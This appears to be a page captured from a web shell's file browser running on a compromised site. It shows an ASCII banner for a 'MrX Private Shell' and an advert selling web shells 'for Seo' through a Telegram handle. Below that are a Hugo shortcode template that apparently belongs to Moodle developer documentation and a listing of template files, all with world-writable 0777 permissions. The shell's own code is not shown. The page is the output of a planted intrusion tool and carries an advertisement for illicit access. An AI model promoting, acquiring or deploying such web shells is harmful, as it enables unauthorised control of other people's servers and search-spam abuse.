__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
{{- /*
Usage: `mustache [args]`
`args` are:
template: required, the logical Moodle mustache template name
class: any extra class(es) to be added to the rendendered template `div` - default ""
show_markup: if the markup should be output in the HTML - default: `true`
*/ -}}
<div id="root{{- .Position.LineNumber -}}" data-region="mustachecode" data-template="{{- .Get "template" -}}" class="mb-5 mt-2 bg-light p-4">
<div class="d-none" data-region="rawcontext">{{- (trim .Inner "\n") -}}</div>
<h6 data-action="refresh" class="mb-3">{{- .Get "template" -}}</h6>
<nav>
<div class="nav nav-tabs" id="nav-tab" role="tablist">
<a class="nav-item nav-link active"
id="nav-rendered{{- .Position.LineNumber -}}-tab"
data-toggle="tab"
href="#nav-rendered{{- .Position.LineNumber -}}"
role="tab" aria-controls="nav-rendered{{- .Position.LineNumber -}}" aria-selected="true"
>
Rendered
</a>
<a class="nav-item nav-link"
id="nav-template{{- .Position.LineNumber -}}-tab"
data-toggle="tab"
href="#nav-template{{- .Position.LineNumber -}}" role="tab" aria-controls="nav-template{{- .Position.LineNumber -}}" aria-selected="false"
>
Template
</a>
<a class="nav-item nav-link"
id="nav-variables{{- .Position.LineNumber -}}-tab"
data-toggle="tab"
href="#nav-variables{{- .Position.LineNumber -}}" role="tab" aria-controls="nav-variables{{- .Position.LineNumber -}}" aria-selected="false"
>
Variables
</a>
</div>
</nav>
<div class="tab-content border-start border-bottom border-end p-3 bg-white" id="nav-tabContent">
<div class="tab-pane fade show active" id="nav-rendered{{- .Position.LineNumber -}}" role="tabpanel" aria-labelledby="nav-rendered{{- .Position.LineNumber -}}-tab">
<div data-region="mustacherendered" class="{{ with .Get "class" }}{{ . }}{{ end }}">
<div class="d-flex justify-content-center my-5">
<div class="spinner-grow text-secondary" role="status">
<span class="sr-only">Loading...</span>
</div>
</div>
</div>
</div>
<div class="tab-pane fade" id="nav-template{{- .Position.LineNumber -}}" role="tabpanel" aria-labelledby="nav-template{{- .Position.LineNumber -}}-tab">
<pre data-region="mustachesource" class="mb3">
</pre>
</div>
<div class="tab-pane fade" id="nav-variables{{- .Position.LineNumber -}}" role="tabpanel" aria-labelledby="nav-variables{{- .Position.LineNumber -}}-tab">
<div data-region="mustachecontext" class="mb3">
{{- highlight (trim .Inner "\n") "js" "" -}}
</div>
</div>
</div>
</div>
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| callout.html | File | 234 B | 0777 |
|
| docsref.html | File | 65 B | 0777 |
|
| example.html | File | 1.08 KB | 0777 |
|
| image.html | File | 104 B | 0777 |
|
| jsdoc.html | File | 1.42 KB | 0777 |
|
| markdown.html | File | 29 B | 0777 |
|
| moodleicons.html | File | 772 B | 0777 |
|
| mustache.html | File | 2.95 KB | 0777 |
|
| param.html | File | 596 B | 0777 |
|
| partial.html | File | 25 B | 0777 |
|
| php.html | File | 135 B | 0777 |
|
| placeholder.html | File | 1.71 KB | 0777 |
|
| year.html | File | 66 B | 0777 |
|